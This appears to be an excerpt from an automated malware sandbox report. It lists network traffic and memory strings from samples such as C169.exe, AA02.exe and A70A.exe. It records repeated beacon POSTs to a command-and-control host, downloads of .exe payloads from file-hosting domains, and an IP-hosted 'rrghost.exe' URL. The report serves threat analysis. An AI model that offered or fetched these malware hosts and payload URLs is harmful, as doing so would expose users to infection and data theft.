                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://smpro.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ieqswdu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vneyujlfl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 255Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://viqgctnic.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xpkskgrr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kdyponywr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxdwffwjbf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://molwdgi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 231Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /files/6096_1638289274_6885.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gghke.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dpsjrby.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mlwynhpbb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 272Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://njupmvh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 168Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mjghwr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unuta.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fucabofxh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://guasgjf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-7000.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfwtp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pubplnqymd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 368Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xwkfccuhh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vndygv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 292Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wyjxomh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mdthdprqu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /files/4152_1638095425_4339.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qpiidyh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mgjqknucl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ehiesag.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eyepuy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lqyvwperx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omcxl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vhude.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: GET /files/5311_1638303032_7343.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: host-file-host-3.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxjdalrcm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wxhnpjysno.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 113Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tiketfrip.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://srvivkc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jjguoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ysemel.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dagsykb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://owgeqjie.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 143Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rvwnoilj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ggqrkginit.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: host-data-coin-11.com
                        Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vutak.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: host-data-coin-11.com
                        Source: global trafficTCP traffic: 192.168.2.3:49850 -> 45.9.20.149:42871
                        Source: C169.exe, 00000017.00000002.597347533.0000000002F77000.00000004.00000001.sdmpString found in binary or memory: http://95.181.152.139
                        Source: C169.exe, 00000017.00000002.593626249.0000000002CE0000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.597347533.0000000002F77000.00000004.00000001.sdmpString found in binary or memory: http://95.181.152.139/rrghost.exe
                        Source: C169.exe, 00000017.00000002.597347533.0000000002F77000.00000004.00000001.sdmpString found in binary or memory: http://95.181.152.1394
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
                        Source: C169.exe, 00000017.00000002.597768606.0000000002FB3000.00000004.00000001.sdmpString found in binary or memory: http://cdn.discordapp.com
                        Source: C169.exe, 00000017.00000002.605280039.0000000006871000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.557402199.000000000489F000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000002.567233290.000000000489F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                        Source: AA02.exe, 00000016.00000002.528893220.00000000008FB000.00000004.00000001.sdmpString found in binary or memory: http://file-file-host4.com/sqlite3.dlleT&f
                        Source: AA02.exe, 00000016.00000002.528893220.00000000008FB000.00000004.00000001.sdmpString found in binary or memory: http://file-file-host4.com/sqlite3.dllpTSf
                        Source: AA02.exe, 00000016.00000002.528731887.00000000008E7000.00000004.00000001.sdmpString found in binary or memory: http://file-file-host4.com/tratata.php
                        Source: AA02.exe, 00000016.00000002.528731887.00000000008E7000.00000004.00000001.sdmpString found in binary or memory: http://file-file-host4.com/tratata.phpL
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://forms.rea
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
                        Source: C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, D375.exe, 0000001A.00000003.520610995.0000000001576000.00000004.00000001.sdmp, D375.exe, 0000001A.00000003.520807500.0000000001576000.00000004.00000001.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                        Source: A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://go.micros
                        Source: AA02.exe, 00000016.00000002.528893220.00000000008FB000.00000004.00000001.sdmpString found in binary or memory: http://hose-file-host4.com/sqlite3.dll
                        Source: AA02.exe, 00000016.00000002.529782826.000000000094E000.00000004.00000001.sdmpString found in binary or memory: http://hosile-file-host4.com/tratata.php
                        Source: C169.exe, 00000017.00000002.605485647.00000000068A5000.00000004.00000001.sdmpString found in binary or memory: http://microsoft.co
                        Source: A70A.exe, 0000000B.00000002.599445868.000000000345C000.00000004.00000001.sdmpString found in binary or memory: http://ns.ado/1
                        Source: A70A.exe, 0000000B.00000002.599445868.000000000345C000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.c/g
                        Source: A70A.exe, 0000000B.00000002.599445868.000000000345C000.00000004.00000001.sdmpString found in binary or memory: http://ns.adobe.cobj
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
                        Source: C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultD
                        Source: A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                        Source: A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
